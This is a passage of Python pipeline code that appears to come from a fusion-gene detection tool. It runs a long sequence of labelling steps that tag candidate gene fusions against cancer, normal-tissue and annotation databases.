job.add('--filter_gene_pairs',outdir('list_candidates_ambiguous_homologous_genes.txt'),kind='input',temp_path=temp_flag) job.add('--output_fusion_genes',outdir('candidate_fusion-genes_07.txt'),kind='output') job.run() # label fusion genes -- minimum distance between genes on the same strand job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_07.txt'),kind='input',temp_path=temp_flag) job.add('--label','short_distance',kind='parameter') job.add('--min_dist_gene_gene',options.min_dist,kind='parameter') job.add('--min_dist_gene_gene_database',datadir('exons.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_08.txt'),kind='output') job.run() # label fusion genes -- minimum distance between genes on the same strand job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_08.txt'),kind='input',temp_path=temp_flag) job.add('--label','dist1000bp',kind='parameter') job.add('--min_dist_gene_gene','1000',kind='parameter') job.add('--min_dist_gene_gene_database',datadir('exons.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_09.txt'),kind='output') job.run() # label fusion genes -- minimum distance between genes on the same strand job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_09.txt'),kind='input',temp_path=temp_flag) job.add('--label','dist10kbp',kind='parameter') job.add('--min_dist_gene_gene','10000',kind='parameter') job.add('--min_dist_gene_gene_database',datadir('exons.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_10.txt'),kind='output') job.run() # label fusion genes -- minimum distance between genes on the same strand job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_10.txt'),kind='input',temp_path=temp_flag) job.add('--label','dist100kbp',kind='parameter') job.add('--min_dist_gene_gene','100000',kind='parameter') job.add('--min_dist_gene_gene_database',datadir('exons.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_11.txt'),kind='output') job.run() # label fusion genes -- pseudogenes job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_11.txt'),kind='input',temp_path=temp_flag) job.add('--label','pseudogene',kind='parameter') job.add('--filter_genes',datadir('pseudogenes.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_12.txt'),kind='output') job.run() # label fusion genes -- rRNA (again) job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_12.txt'),kind='input',temp_path=temp_flag) job.add('--label','rrna',kind='parameter') job.add('--filter_genes',datadir('rrnas.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_13.txt'),kind='output') job.run() # label fusion genes -- tRNA job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_13.txt'),kind='input',temp_path=temp_flag) job.add('--label','trna',kind='parameter') job.add('--filter_genes',datadir('trnas.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_14.txt'),kind='output') job.run() # label fusion genes -- miRNA job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_14.txt'),kind='input',temp_path=temp_flag) job.add('--label','mirna',kind='parameter') job.add('--filter_genes',datadir('mirnas.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_15.txt'),kind='output') job.run() # label fusion genes -- lncRNA job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_15.txt'),kind='input',temp_path=temp_flag) job.add('--label','lncrna',kind='parameter') job.add('--filter_genes',datadir('lncrnas.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_16.txt'),kind='output') job.run() # label fusion genes -- MT job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_16.txt'),kind='input',temp_path=temp_flag) job.add('--label','mt',kind='parameter') job.add('--filter_genes',datadir('mt.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_17.txt'),kind='output') job.run() # label fusion genes -- snoRNA job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_17.txt'),kind='input',temp_path=temp_flag) job.add('--label','snorna',kind='parameter') job.add('--filter_genes',datadir('snornas.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_18.txt'),kind='output') job.run() # label fusion genes -- snRNA job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_18.txt'),kind='input',temp_path=temp_flag) job.add('--label','snrna',kind='parameter') job.add('--filter_genes',datadir('snrnas.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_19.txt'),kind='output') job.run() # label fusion genes -- Y RNAs job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_19.txt'),kind='input',temp_path=temp_flag) job.add('--label','yrna',kind='parameter') job.add('--filter_genes',datadir('rnas_y.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_20.txt'),kind='output') job.run() # label fusion genes -- 7SK RNAs job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_20.txt'),kind='input',temp_path=temp_flag) job.add('--label','7skrna',kind='parameter') job.add('--filter_genes',datadir('7skrnas.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_21.txt'),kind='output') job.run() # label fusion genes -- metastasis job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_21.txt'),kind='input',temp_path=temp_flag) job.add('--label','metastasis',kind='parameter') job.add('--filter_genes',datadir('metastasis.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_22.txt'),kind='output') job.run() # # label fusion genes -- antisense # job.add(_FC_+'label_fusion_genes.py',kind='program') # job.add('--input',outdir('candidate_fusion-genes_21.txt'),kind='input',temp_path=temp_flag) # job.add('--label','antisense',kind='parameter') # job.add('--filter_genes',datadir('antisenses.txt'),kind='input') # job.add('--output_fusion_genes',outdir('candidate_fusion-genes_22.txt'),kind='output') # job.run() # label fusion genes -- paralogs job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_22.txt'),kind='input',temp_path=temp_flag) job.add('--label','pair_pseudo_genes',kind='parameter') job.add('--filter_gene_pairs',datadir('pairs_pseudogenes.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_23.txt'),kind='output') job.run() # label fusion genes -- ribosomal proteins job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_23.txt'),kind='input',temp_path=temp_flag) job.add('--label','ribosomal',kind='parameter') job.add('--filter_genes',datadir('ribosomal_proteins.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_24.txt'),kind='output') job.run() # label fusion genes -- oncogenes job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_24.txt'),kind='input',temp_path=temp_flag) job.add('--label','oncogene',kind='parameter') job.add('--filter_genes',datadir('oncogenes_more.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_25.txt'),kind='output') job.run() # label fusion genes -- cosmic job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_25.txt'),kind='input',temp_path=temp_flag) job.add('--label','cosmic',kind='parameter') job.add('--filter_gene_pairs',datadir('cosmic.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_27.txt'),kind='output') job.run() # label fusion genes -- ChimerDB 2.0 job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_27.txt'),kind='input',temp_path=temp_flag) job.add('--label','chimer2',kind='parameter') job.add('--filter_gene_pairs',datadir('chimerdb2.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_28.txt'),kind='output') job.run() # label fusion genes -- CGP job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_28.txt'),kind='input',temp_path=temp_flag) job.add('--label','cgp',kind='parameter') job.add('--filter_gene_pairs',datadir('cgp.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_29.txt'),kind='output') job.run() # label fusion genes -- ConjoinG job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_29.txt'),kind='input',temp_path=temp_flag) job.add('--label','conjoing',kind='parameter') job.add('--filter_gene_pairs',datadir('conjoing.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_30.txt'),kind='output') job.run() # label fusion genes -- TICdb job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_30.txt'),kind='input',temp_path=temp_flag) job.add('--label','ticdb',kind='parameter') job.add('--filter_gene_pairs',datadir('ticdb.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_31.txt'),kind='output') job.run() # # label fusion genes -- RP11-... genes # job.add(_FC_+'label_fusion_genes.py',kind='program') # job.add('--input',outdir('candidate_fusion-genes_31.txt'),kind='input',temp_path=temp_flag) # job.add('--label','rp11',kind='parameter') # job.add('--filter_genes',datadir('rp11.txt'),kind='input') # job.add('--output_fusion_genes',outdir('candidate_fusion-genes_32.txt'),kind='output') # job.run() # # label fusion genes -- CTA-... genes # job.add(_FC_+'label_fusion_genes.py',kind='program') # job.add('--input',outdir('candidate_fusion-genes_32.txt'),kind='input',temp_path=temp_flag) # job.add('--label','cta',kind='parameter') # job.add('--filter_genes',datadir('cta.txt'),kind='input') # job.add('--output_fusion_genes',outdir('candidate_fusion-genes_33.txt'),kind='output') # job.run() # # label fusion genes -- CTB-... genes # job.add(_FC_+'label_fusion_genes.py',kind='program') # job.add('--input',outdir('candidate_fusion-genes_33.txt'),kind='input',temp_path=temp_flag) # job.add('--label','ctb',kind='parameter') # job.add('--filter_genes',datadir('ctb.txt'),kind='input') # job.add('--output_fusion_genes',outdir('candidate_fusion-genes_34.txt'),kind='output') # job.run() # # label fusion genes -- CTD-... genes # job.add(_FC_+'label_fusion_genes.py',kind='program') # job.add('--input',outdir('candidate_fusion-genes_34.txt'),kind='input',temp_path=temp_flag) # job.add('--label','ctd',kind='parameter') # job.add('--filter_genes',datadir('ctd.txt'),kind='input') # job.add('--output_fusion_genes',outdir('candidate_fusion-genes_35.txt'),kind='output') # job.run() # # label fusion genes -- CTC-... genes # job.add(_FC_+'label_fusion_genes.py',kind='program') # job.add('--input',outdir('candidate_fusion-genes_35.txt'),kind='input',temp_path=temp_flag) # job.add('--label','ctc',kind='parameter') # job.add('--filter_genes',datadir('ctc.txt'),kind='input') # job.add('--output_fusion_genes',outdir('candidate_fusion-genes_36.txt'),kind='output') # job.run() # # label fusion genes -- RP??-... genes # job.add(_FC_+'label_fusion_genes.py',kind='program') # job.add('--input',outdir('candidate_fusion-genes_36.txt'),kind='input',temp_path=temp_flag) # job.add('--label','rp',kind='parameter') # job.add('--filter_genes',datadir('rp.txt'),kind='input') # job.add('--output_fusion_genes',outdir('candidate_fusion-genes_37.txt'),kind='output') # job.run() # label fusion genes -- found in healthy samples job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_31.txt'),kind='input',temp_path=temp_flag) job.add('--label','healthy',kind='parameter') job.add('--filter_gene_pairs',datadir('healthy.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_38.txt'),kind='output') job.run() # label fusion genes -- CACG job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_38.txt'),kind='input',temp_path=temp_flag) job.add('--label','cacg',kind='parameter') job.add('--filter_gene_pairs',datadir('cacg.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_39.txt'),kind='output') job.run() # label fusion genes -- fully overlapping in UCSC job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_39.txt'),kind='input',temp_path=temp_flag) job.add('--label','ucsc_fully_overlapping',kind='parameter') job.add('--filter_gene_pairs',datadir('ucsc_fully_overlapping_genes.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_40.txt'),kind='output') job.run() # label fusion genes -- partially overlapping in UCSC job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_40.txt'),kind='input',temp_path=temp_flag) job.add('--label','ucsc_partially_overlapping',kind='parameter') job.add('--filter_gene_pairs',datadir('ucsc_partially_overlapping_genes.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_41.txt'),kind='output') job.run() # label fusion genes -- overlapping and on same strand in UCSC job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_41.txt'),kind='input',temp_path=temp_flag) job.add('--label','ucsc_same_strand_overlapping',kind='parameter') job.add('--filter_gene_pairs',datadir('ucsc_same_strand_overlapping_genes.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_42.txt'),kind='output') job.run() # label fusion genes -- fully overlapping in RefSeq job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_42.txt'),kind='input',temp_path=temp_flag) job.add('--label','refseq_fully_overlapping',kind='parameter') job.add('--filter_gene_pairs',datadir('refseq_fully_overlapping_genes.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_43.txt'),kind='output') job.run() # label fusion genes -- partially overlapping in RefSeq job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_43.txt'),kind='input',temp_path=temp_flag) job.add('--label','refseq_partially_overlapping',kind='parameter') job.add('--filter_gene_pairs',datadir('refseq_partially_overlapping_genes.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_44.txt'),kind='output') job.run() # label fusion genes -- overlapping and on same strand in RefSeq job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_44.txt'),kind='input',temp_path=temp_flag) job.add('--label','refseq_same_strand_overlapping',kind='parameter') job.add('--filter_gene_pairs',datadir('refseq_same_strand_overlapping_genes.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_45.txt'),kind='output') job.run() # label fusion genes -- duplicated genes from DGD database job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_45.txt'),kind='input',temp_path=temp_flag) job.add('--label','duplicates',kind='parameter') job.add('--filter_gene_pairs',datadir('dgd.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_46.txt'),kind='output') job.run() # label fusion genes -- TCGA job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_46.txt'),kind='input',temp_path=temp_flag) job.add('--label','tcga',kind='parameter') job.add('--filter_gene_pairs',datadir('tcga.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_47.txt'),kind='output') job.run() # label fusion genes -- BodyMap2 job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_47.txt'),kind='input',temp_path=temp_flag) job.add('--label','bodymap2',kind='parameter') job.add('--filter_gene_pairs',datadir('bodymap2.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_48.txt'),kind='output') job.run() # label fusion genes -- Metazoa job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_48.txt'),kind='input',temp_path=temp_flag) job.add('--label','metazoa',kind='parameter') job.add('--filter_genes',datadir('metazoa.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_49.txt'),kind='output') job.run() # label fusion genes -- cell lines job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_49.txt'),kind='input',temp_path=temp_flag) job.add('--label','ccle2',kind='parameter') job.add('--filter_gene_pairs',datadir('ccle2.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_50.txt'),kind='output') job.run() # label fusion genes -- ambiguous (only if the abguous counts > supporting pairs) job.add(_FC_+'label_ambiguous_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_50.txt'),kind='input',temp_path=temp_flag) job.add('--label','ambiguous',kind='parameter') job.add('--factor','20',kind='parameter') # 15 job.add('--input_ambiguous',outdir('all_ambiguous_genes.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_51.txt'),kind='output') job.run() # label fusion genes -- fully overlapping in RefSeq job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_51.txt'),kind='input',temp_path=temp_flag) job.add('--label','gencode_fully_overlapping',kind='parameter') job.add('--filter_gene_pairs',datadir('gencode_fully_overlapping_genes.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_52.txt'),kind='output') job.run() # label fusion genes -- partially overlapping in RefSeq job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_52.txt'),kind='input',temp_path=temp_flag) job.add('--label','gencode_partially_overlapping',kind='parameter') job.add('--filter_gene_pairs',datadir('gencode_partially_overlapping_genes.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_53.txt'),kind='output') job.run() # label fusion genes -- overlapping and on same strand in RefSeq job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_53.txt'),kind='input',temp_path=temp_flag) job.add('--label','gencode_same_strand_overlapping',kind='parameter') job.add('--filter_gene_pairs',datadir('gencode_same_strand_overlapping_genes.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_54.txt'),kind='output') job.run() # label fusion genes -- overlapping and on same strand in RefSeq job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_54.txt'),kind='input',temp_path=temp_flag) job.add('--label','prostate_cancer',kind='parameter') job.add('--filter_gene_pairs',datadir('prostate_cancer.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_55.txt'),kind='output') job.run() # label fusion genes -- non-tumor cell lines job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_55.txt'),kind='input',temp_path=temp_flag) job.add('--label','non_tumor_cells',kind='parameter') job.add('--filter_gene_pairs',datadir('non-tumor_cells.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_56.txt'),kind='output') job.run() # label with focus the fusions which are given by the user if options.focus_fusions and not empty(options.focus_fusions): job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_56.txt'),kind='input',temp_path=temp_flag) job.add('--label','focus',kind='parameter') job.add('--filter_gene_pairs',options.focus_fusions,kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_57.txt'),kind='output') job.run() else: job.link(outdir('candidate_fusion-genes_56.txt'),outdir('candidate_fusion-genes_57.txt'),temp_path=temp_flag) # label fusion genes -- fragments which fall below the spanning pairs in case of fragmentation if fragments_flag: job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_57.txt'),kind='input',temp_path=temp_flag) job.add('--label','fragments',kind='parameter') job.add('--filter_gene_pairs',outdir('candidate_fusion-genes_fragments.txt'),kind='input',temp_path=temp_flag) job.add('--output_fusion_genes',outdir('candidate_fusion-genes_58.txt'),kind='output') job.run() else: job.link(outdir('candidate_fusion-genes_57.txt'),outdir('candidate_fusion-genes_58.txt'),temp_path=temp_flag) # label fusion genes -- non-tumor cell lines job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_58.txt'),kind='input',temp_path=temp_flag) job.add('--label','hpa',kind='parameter') job.add('--filter_gene_pairs',datadir('hpa.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_59.txt'),kind='output') job.run() # label fusion genes -- minimum distance between genes on the same strand job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_59.txt'),kind='input',temp_path=temp_flag) job.add('--label','dist200kbp',kind='parameter') job.add('--min_dist_gene_gene','200000',kind='parameter') job.add('--min_dist_gene_gene_database',datadir('exons.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_60.txt'),kind='output') job.run() # label fusion genes -- minimum distance between genes on the same strand job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_60.txt'),kind='input',temp_path=temp_flag) job.add('--label','gtex',kind='parameter') job.add('--filter_gene_pairs',datadir('gtex.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_61.txt'),kind='output') job.run() # label fusion genes -- non-cancer tissues job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_61.txt'),kind='input',temp_path=temp_flag) job.add('--label','non_cancer_tissues',kind='parameter') job.add('--filter_gene_pairs',datadir('non-cancer_tissues.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_62.txt'),kind='output') job.run() # label fusion genes -- hla job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_62.txt'),kind='input',temp_path=temp_flag) job.add('--label','hla',kind='parameter') job.add('--filter_genes',datadir('hla.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_63.txt'),kind='output') job.run() # label fusion genes -- 1000 genomes job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_63.txt'),kind='input',temp_path=temp_flag) job.add('--label','1000genomes',kind='parameter') job.add('--filter_gene_pairs',datadir('1000genomes.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_64.txt'),kind='output') job.run() # label fusion genes -- 18 cancers job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_64.txt'),kind='input',temp_path=temp_flag) job.add('--label','18cancers',kind='parameter') job.add('--filter_gene_pairs',datadir('18cancers.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_65.txt'),kind='output') job.run() # label fusion genes -- gliomas job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_65.txt'),kind='input',temp_path=temp_flag) job.add('--label','gliomas',kind='parameter') job.add('--filter_gene_pairs',datadir('gliomas.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_66.txt'),kind='output') job.run() # label fusion genes -- ChimerDB 3 job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_66.txt'),kind='input',temp_path=temp_flag) job.add('--label','chimer4kb',kind='parameter') job.add('--filter_gene_pairs',datadir('chimerdb4kb.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_67.txt'),kind='output') job.run() job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_67.txt'),kind='input',temp_path=temp_flag) job.add('--label','chimer4pub',kind='parameter') job.add('--filter_gene_pairs',datadir('chimerdb4pub.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_68.txt'),kind='output') job.run() job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_68.txt'),kind='input',temp_path=temp_flag) job.add('--label','chimer4seq',kind='parameter') job.add('--filter_gene_pairs',datadir('chimerdb4seq.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_69.txt'),kind='output') job.run() job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_69.txt'),kind='input',temp_path=temp_flag) job.add('--label','cancer',kind='parameter') job.add('--filter_genes',datadir('cancer_genes.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_70.txt'),kind='output') job.run() job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_70.txt'),kind='input',temp_path=temp_flag) job.add('--label','tumor',kind='parameter') job.add('--filter_genes',datadir('tumor_genes.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_71.txt'),kind='output') job.run() # add label multi-mappers job.add(_FC_+'label_multi.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_71.txt'),kind='input',temp_path=temp_flag) job.add('--label','m,multi',kind='parameter') job.add('--pairs',spanning_pairs_minimum,kind='parameter') job.add('--data',outdir('candidate_fusion-genes_no-offending-reads.txt'),kind='input',temp_path=temp_flag) job.add('--output',outdir('candidate_fusion-genes_72.txt'),kind='output') job.run() # label fusion genes -- pancreatic job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_72.txt'),kind='input',temp_path=temp_flag) job.add('--label','pancreases',kind='parameter') job.add('--filter_gene_pairs',datadir('pancreases.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_73.txt'),kind='output') job.run() # label fusion genes -- tcga-cancer job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_73.txt'),kind='input',temp_path=temp_flag) job.add('--label','tcga-cancer',kind='parameter') job.add('--filter_gene_pairs',datadir('tcga-cancer.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_74.txt'),kind='output') job.run() # label fusion genes -- tcga-normal job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_74.txt'),kind='input',temp_path=temp_flag) job.add('--label','tcga-normal',kind='parameter') job.add('--filter_gene_pairs',datadir('tcga-normal.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_75.txt'),kind='output') job.run() # label fusion genes -- TCGA2 job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_75.txt'),kind='input',temp_path=temp_flag) job.add('--label','tcga2',kind='parameter') job.add('--filter_gene_pairs',datadir('tcga2.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_76.txt'),kind='output') job.run() # label fusion genes -- prefrontal cortex job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_76.txt'),kind='input',temp_path=temp_flag) job.add('--label','cortex',kind='parameter') job.add('--filter_gene_pairs',datadir('cortex.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_77.txt'),kind='output') job.run() # label rt-circ RNAs job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_77.txt'),kind='input',temp_path=temp_flag) job.add('--label','rt_circ_rna',kind='parameter') job.add('--filter_gene_pairs',datadir('rtcircrnas.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_78.txt'),kind='output') job.run() # label OncoKB job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_78.txt'),kind='input',temp_path=temp_flag) job.add('--label','oncokb',kind='parameter') job.add('--filter_gene_pairs',datadir('oncokb.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_79.txt'),kind='output') job.run() # label Mitelman job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_79.txt'),kind='input',temp_path=temp_flag) job.add('--label','mitelman',kind='parameter') job.add('--filter_gene_pairs',datadir('mitelman.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_80.txt'),kind='output') job.run() # label PCAWG job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_80.txt'),kind='input',temp_path=temp_flag) job.add('--label','pcawg',kind='parameter') job.add('--filter_gene_pairs',datadir('pcawg.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_81.txt'),kind='output') job.run() # label CCLE job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_81.txt'),kind='input',temp_path=temp_flag) job.add('--label','ccle',kind='parameter') job.add('--filter_gene_pairs',datadir('ccle.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_82.txt'),kind='output') job.run() # label CCLE job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_82.txt'),kind='input',temp_path=temp_flag) job.add('--label','ccle3',kind='parameter') job.add('--filter_gene_pairs',datadir('ccle3.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_83.txt'),kind='output') job.run() # label TCGA job.add(_FC_+'label_fusion_genes.py',kind='program') job.add('--input',outdir('candidate_fusion-genes_83.txt'),kind='input',temp_path=temp_flag) job.add('--label','tcga3',kind='parameter') job.add('--filter_gene_pairs',datadir('tcga3.txt'),kind='input') job.add('--output_fusion_genes',outdir('candidate_fusion-genes_84.txt'),kind='output') job.run() # label fusions with smaller reads in supporting pair-reads job.add(_FC_+'label_fusion_genes_trim2.py',kind='program') # trim2 job.add('--input',outdir('candidate_fusion-genes_84.txt'),kind='input',temp_path=temp_flag) job.add('--fusions_pairs',outdir('candidate_fusion-genes_supporting_paired-reads.txt'),kind='input') job.add('--smaller_pairs',outdir('reads_not-mapped_trim2_ids.txt'),kind='input',temp_path=temp_flag) job.add('--output_fusion_genes',outdir('candidate_fusion-genes_1000.txt'),kind='output') job.run() # last_candidate_file = outdir('candidate_fusion-genes_1000.txt') if options.label_file: title = options.label_title.strip().split(',') files = options.label_file.strip().split(',') thres = None if options.label_threshold: thres = options.label_threshold.strip().split(',') ainput = outdir('candidate_fusion-genes_custom___0.txt') job.link(last_candidate_file, ainput, temp_path = temp_flag) aout = 